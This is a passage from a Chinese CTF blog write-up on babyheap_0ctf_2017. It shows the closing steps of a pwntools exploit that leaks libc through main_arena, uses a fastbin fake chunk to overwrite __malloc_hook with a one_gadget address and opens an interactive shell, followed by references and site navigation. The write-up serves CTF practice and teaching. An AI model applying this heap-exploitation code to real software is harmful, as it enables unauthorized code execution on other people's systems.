class="token operator">=</span>u64<span class="token punctuation">(</span>p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'\x7f'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">b'\x00\x00'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="57"></td><td><pre></pre></td></tr><tr><td data-num="58"></td><td><pre>libc_base<span class="token operator">=</span>main_arena_88<span class="token operator">-</span><span class="token number">0x3c4b78</span> </pre></td></tr><tr><td data-num="59"></td><td><pre></pre></td></tr><tr><td data-num="60"></td><td><pre><span class="token comment">#步骤 5</span></pre></td></tr><tr><td data-num="61"></td><td><pre>fake_chunk<span class="token operator">=</span> libc_base<span class="token operator">+</span><span class="token number">0x3c4aed</span> </pre></td></tr><tr><td data-num="62"></td><td><pre></pre></td></tr><tr><td data-num="63"></td><td><pre><span class="token comment">#步骤 6</span></pre></td></tr><tr><td data-num="64"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x60</span><span class="token punctuation">)</span> <span class="token comment">#回收一部分 chunk4</span></pre></td></tr><tr><td data-num="65"></td><td><pre>free<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span>  <span class="token comment">#使 chunk4 进入 fastbin 中</span></pre></td></tr><tr><td data-num="66"></td><td><pre></pre></td></tr><tr><td data-num="67"></td><td><pre>payload4<span class="token operator">=</span>p64<span class="token punctuation">(</span>fake_chunk<span class="token punctuation">)</span>  <span class="token comment">#改写 chunk4 的 fd 使 fake_chunk 进入 fastbin</span></pre></td></tr><tr><td data-num="68"></td><td><pre>fill<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token builtin">len</span><span class="token punctuation">(</span>payload4<span class="token punctuation">)</span><span class="token punctuation">,</span>payload4<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="69"></td><td><pre></pre></td></tr><tr><td data-num="70"></td><td><pre><span class="token comment">#步骤 7</span></pre></td></tr><tr><td data-num="71"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x60</span><span class="token punctuation">)</span>  <span class="token comment">#index4，分配 chunk4</span></pre></td></tr><tr><td data-num="72"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x60</span><span class="token punctuation">)</span>  <span class="token comment">#index5，分配 fake_chunk</span></pre></td></tr><tr><td data-num="73"></td><td><pre></pre></td></tr><tr><td data-num="74"></td><td><pre><span class="token comment">#因为 malloc_hook=main_arena-0x10，fake_chunk=mian_arena-0x33</span></pre></td></tr><tr><td data-num="75"></td><td><pre><span class="token comment">#所以 malloc_hook=fake_chunk+0x23 (fake_chunk+0x33-0x10)</span></pre></td></tr><tr><td data-num="76"></td><td><pre></pre></td></tr><tr><td data-num="77"></td><td><pre>payload5<span class="token operator">=</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p8<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">*</span><span class="token number">3</span>  <span class="token comment">#0x13</span></pre></td></tr><tr><td data-num="78"></td><td><pre>payload5<span class="token operator">+=</span>p64<span class="token punctuation">(</span>libc_base<span class="token operator">+</span><span class="token number">0x4526a</span><span class="token punctuation">)</span>  <span class="token comment">#0x4526a 由 one_gadget 查找得到</span></pre></td></tr><tr><td data-num="79"></td><td><pre>fill<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">,</span><span class="token builtin">len</span><span class="token punctuation">(</span>payload5<span class="token punctuation">)</span><span class="token punctuation">,</span>payload5<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="80"></td><td><pre></pre></td></tr><tr><td data-num="81"></td><td><pre>allocate<span class="token punctuation">(</span><span class="token number">0x60</span><span class="token punctuation">)</span>               <span class="token comment">#index6, 执行一次就会执行 malloc_hook，就可以 getshell</span></pre></td></tr><tr><td data-num="82"></td><td><pre></pre></td></tr><tr><td data-num="83"></td><td><pre>p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure><p><img data-src="https://z1.ax1x.com/2023/09/14/pPW9VAI.png" alt="" /></p>
<p>参考：<br />
<span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3RoaW5rX3ljeC9hcnRpY2xlL2RldGFpbHMvNzc5ODI0Mzk=">https://blog.csdn.net/think_ycx/article/details/77982439</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9iYnMua2FueHVlLmNvbS90aHJlYWQtMjIzNDYxLmh0bQ==">https://bbs.kanxue.com/thread-223461.htm</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OS9hcnRpY2xlL2RldGFpbHMvMTA0ODk3MjQ5">https://blog.csdn.net/weixin_43847969/article/details/104897249</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21jbXV5YW5nYS9hcnRpY2xlL2RldGFpbHMvMTA4MzYwMzc1">https://blog.csdn.net/mcmuyanga/article/details/108360375</span></p>
<p>关于堆的参数：<br />
<span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg0Nzk2OS9hcnRpY2xlL2RldGFpbHMvMTA0ODk3MjQ5">https://blog.csdn.net/weixin_43847969/article/details/104897249</span></p>
<div class="tags"><a href="/tags/pwn/" rel="tag"><i class="ic i-tag"></i>pwn</a><a href="/tags/fastbin-attack/" rel="tag"><i class="ic i-tag"></i>fastbin.attack</a></div></div><footer><div class="meta"><span class="icon"><i class="ic i-eye"></i></span><span>此文章已被阅读次数:</span><span class="waline-pageview-count" id="twikoo_visitors" data-path="2023/09/12/pwn/刷题/BUUCTF/babyheap_0ctf_2017/">正在加载...</span><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2023-09-26 22:33:50" itemprop="dateModified" datetime="2023-09-26T22:33:50+08:00">2023-09-26</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>vvwwv<i class="ic i-at"><em>@</em></i>0110 0011 0111 1001 0110 0010</li><li class="link"><strong>本文链接：</strong><a href="https://vvwwvv.cn/2023/09/12/pwn/%E5%88%B7%E9%A2%98/BUUCTF/babyheap_0ctf_2017/" title="babyheap_0ctf_2017，fastbin.attack之double.free">https://vvwwvv.cn/2023/09/12/pwn/刷题/BUUCTF/babyheap_0ctf_2017/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2023/09/10/pwn/%E5%88%B7%E9%A2%98/BUUCTF/PicoCTF_2018_rop_chain1/" rel="prev" itemprop="url" data-background-image="https:&#x2F;&#x2F;ooo.0x0.ooo&#x2F;2023&#x2F;09&#x2F;09&#x2F;OnrB9F.jpg" title="PicoCTF_2018_rop_chain"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>BUUCTF</span><h3>PicoCTF_2018_rop_chain</h3></a></div><div class="item right"><a href="/2023/09/12/pwn/%E5%88%B7%E9%A2%98/BUUCTF/bjdctf_2020_babyrop2/" rel="next" itemprop="url" data-background-image="https:&#x2F;&#x2F;ooo.0x0.ooo&#x2F;2023&#x2F;03&#x2F;09&#x2F;Y0iNK.jpg" title="bjdctf_2020_babyrop2（格式化字符串漏洞）"><span class="type">下一篇</span><span class="category"><i class="ic i-flag"></i>格式化字符串漏洞</span><h3>bjdctf_2020_babyrop2（格式化字符串漏洞）</h3></a></div></div><div class="wrap" id="wcomments"></div><script type="module" data-pjax="data-pjax">import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';

setTimeout(function () {
    init({
        el: '#wcomments',
        serverURL: 'https://vvwwvv.zeabur.app',
        lang: 'zh-CN',
        locale: {},
        emoji: ["https://unpkg.com/@waline/emojis@1.0.1/weibo","https://unpkg.com/@waline/emojis@1.0.1/alus","https://unpkg.com/@waline/emojis@1.0.1/bilibili","https://unpkg.com/@waline/emojis@1.0.1/qq","https://unpkg.com/@waline/emojis@1.0.1/tieba","https://unpkg.com/@waline/emojis@1.0.1/tw-emoji"],
        meta: ["nick","mail","link"],
        requiredMeta: ["nick","mail"],
        wordLimit: 0,
        pageSize: 10,
        pageview: true,
        path: window.location.pathname,
        dark: 'html[data-theme="dark"]'
    });
}, 1000)</script></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1%E6%9F%A5%E7%9C%8B%E7%A8%8B%E5%BA%8F"><span class="toc-number">1.</span> <span class="toc-text"> 1. 查看程序</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text"> 2. 漏洞分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text"> 3. 漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BA%A2%E5%87%BA"><span class="toc-number">3.1.</span> <span class="toc-text"> 溢出</span></a></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li  class="active"><a href="/2023/09/12/pwn/%E5%88%B7%E9%A2%98/BUUCTF/babyheap_0ctf_2017/" rel="bookmark" title="babyheap_0ctf_2017，fastbin.attack之double.free">babyheap_0ctf_2017，fastbin.attack之double.free</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" itemprop="image" alt="vvwwv" data-src="/assets/avatar.jpg"/><p class="name" itemprop="name">vvwwv</p><div class="description" itemprop="description"></div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">58</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">51</span><span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">17</span><span class="name">标签</span></a></div></nav><div class="social"><a href="https://github.com/cyb141520" class="item github" rel="noopener" title="https:&#x2F;&#x2F;github.com&#x2F;cyb141520" target="_blank"><i class="ic i-github"></i></a><a href="/1415206596@qq.com" class="item email" title="1415206596@qq.com"><i class="ic i-envelope"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-user"></i>关于</a><ul class="submenu"><li class="item"><a href="/about/" rel="section"><i class="ic i-user"></i>关于本站</a></li><li class="item"><a href="/admiration/" rel="section"><i class="ic i-coffee"></i>赞赏博主</a></li></ul></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2023/09/12/pwn/%E5%88%B7%E9%A2%98/BUUCTF/bjdctf_2020_babyrop2/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2023/09/10/pwn/%E5%88%B7%E9%A2%98/BUUCTF/PicoCTF_2018_rop_chain1/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/CTF/" title="分类于CTF">CTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/PWN%E4%B8%93%E6%A0%8F/" title="分类于PWN专栏">PWN专栏</a></div><span><a href="/2023/09/18/pwn/gdb%E6%9C%AC%E5%9C%B0%E8%B0%83%E8%AF%95/">gdb本地调试，基于pwndbg</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF/" title="分类于CTF">CTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/CTFshow/" title="分类于CTFshow">CTFshow</a><i class="ic i-angle-right"></i><a href="/categories/CTF/CTFshow/%E6%A0%88%E6%BA%A2%E5%87%BA/" title="分类于栈溢出">栈溢出</a></div><span><a href="/2023/10/21/pwn/%E5%88%B7%E9%A2%98/ctfshow/58-68/">CTFshow(栈溢出部分,58~68)</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF/" title="分类于CTF">CTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/BUUCTF/" title="分类于BUUCTF">BUUCTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/BUUCTF/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/" title="分类于格式化字符串漏洞">格式化字符串漏洞</a></div><span><a href="/2023/09/12/pwn/%E5%88%B7%E9%A2%98/BUUCTF/bjdctf_2020_babyrop2/">bjdctf_2020_babyrop2（格式化字符串漏洞）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Java/" title="分类于Java">Java</a></div><span><a href="/2023/09/24/Java/%E4%B8%80%E5%85%83%E4%BA%8C%E6%AC%A1%E6%96%B9%E7%A8%8B%E6%B1%82%E6%A0%B9/">Java作业2023/9/24(一元二次方程求根系统)</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Linux/" title="分类于Linux">Linux</a><i class="ic i-angle-right"></i><a href="/categories/Linux/PWN%E4%B8%93%E6%A0%8F/" title="分类于PWN专栏">PWN专栏</a><i class="ic i-angle-right"></i><a href="/categories/Linux/PWN%E4%B8%93%E6%A0%8F/CTF/" title="分类于CTF">CTF</a></div><span><a href="/2023/08/29/Linux/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8/">Linux之系统调用</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%95%85%E9%9A%9C%E5%A4%84%E7%90%86/" title="分类于故障处理">故障处理</a></div><span><a href="/2023/10/14/Linux/%E6%95%85%E9%9A%9C%E5%A4%84%E7%90%86/">故障处理记录</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF/" title="分类于CTF">CTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/BUUCTF/" title="分类于BUUCTF">BUUCTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/BUUCTF/unlink/" title="分类于unlink">unlink</a></div><span><a href="/2023/10/02/pwn/%E4%B8%93%E6%A0%8F/hitcon2014_stkof/">hitcon2014_stkof（unlink）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF/" title="分类于CTF">CTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/BUUCTF/" title="分类于BUUCTF">BUUCTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/BUUCTF/%E6%A0%88%E6%BA%A2%E5%87%BA/" title="分类于栈溢出">栈溢出</a></div><span><a href="/2023/09/24/pwn/%E5%88%B7%E9%A2%98/BUUCTF/PicoCTF_2018_buffer_overflow/">PicoCTF_2018_buffer_overflow（栈溢出）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF/" title="分类于CTF">CTF</a><i class="ic i-angle-right"></i><a href="/categories/CTF/BUUCTF/" title="分类于BUUCTF">BUUCTF</a></div><span><a href="/2023/09/24/pwn/%E5%88%B7%E9%A2%98/BUUCTF/newstar/">newstart（pwn）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Windows/" title="分类于Windows">Windows</a><i class="ic i-angle-right"></i><a href="/categories/Windows/msf%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB/" title="分类于msf渗透攻击">msf渗透攻击</a></div><span><a href="/2023/09/28/windows/Windows10%E4%B9%8B%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">Windows10永恒之黑漏洞复现（CVE-2020-0796）</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2><ul class="leancloud-recent-comment" id="new-comment"><li class="item" v-for="com in coms"><a v-bind:href="root + com.href" data-pjax-state="data-pjax-state"><span class="breadcrumb">{{com.nick}} @ {{com.time}}</span><span>{{com.text}}<br/></span></a></li></ul></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2023</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">vvwwv @ vvwwv'Blog</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">277k 字</span><span class="post-meta-divider">|</span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">4:12</span></div><div class="powered-by">基于 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & Theme.<a href="https://github.com/theme-shoka-x/hexo-theme-shokaX/" rel="noopener" target="_blank">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
        path: `2023/09/12/pwn/刷题/BUUCTF/babyheap_0ctf_2017/`,
        favicon: {
        show: `不负韶华`,
        hide: `以梦为马！`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,
    chart: false,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://polyfill.io/v3/polyfill.min.js?features=default,fetch"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.0.2/pace.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/algoliasearch/4.12.1/algoliasearch-lite.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/instantsearch.js/4.39.0/instantsearch.production.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/quicklink/2.2.0/quicklink.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/??jquery/3.5.1/jquery.min.js,fancybox/3.5.7/jquery.fancybox.min.js,justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js" async></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/KaTeX/0.15.2/contrib/copy-tex.min.js" async></script><script src="/js/app.js?v=0.3.5"></script>
    <script type="module" data-pjax>
        let items = []
        import { RecentComments } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs'
        RecentComments({
          serverURL: 'https://vvwwvv.zeabur.app',
          count: 10,
        }).then(({ comments }) => {
          comments.forEach(function (item) {
              let cText = (item.orig.length > 50) ? item.orig.substring(0,50)+'...' : item.orig
              item.url = item.url !== '/' ?  '/' + item.url : item.url;
              const siteLink = item.url + "#" + item.objectId
              items.push({
                  href: siteLink,
                  nick: item.nick,
                  time: item.insertedAt.split('T').shift(),
                  text: cText
              })
          })
          Vue.createApp({
            data() {
                return {
                    coms: items,
                    root: ''
                }
            }
          }).mount('#new-comment')
        }).catch(function (err) {
          console.error(err)
        })
    </script>
    </body></html>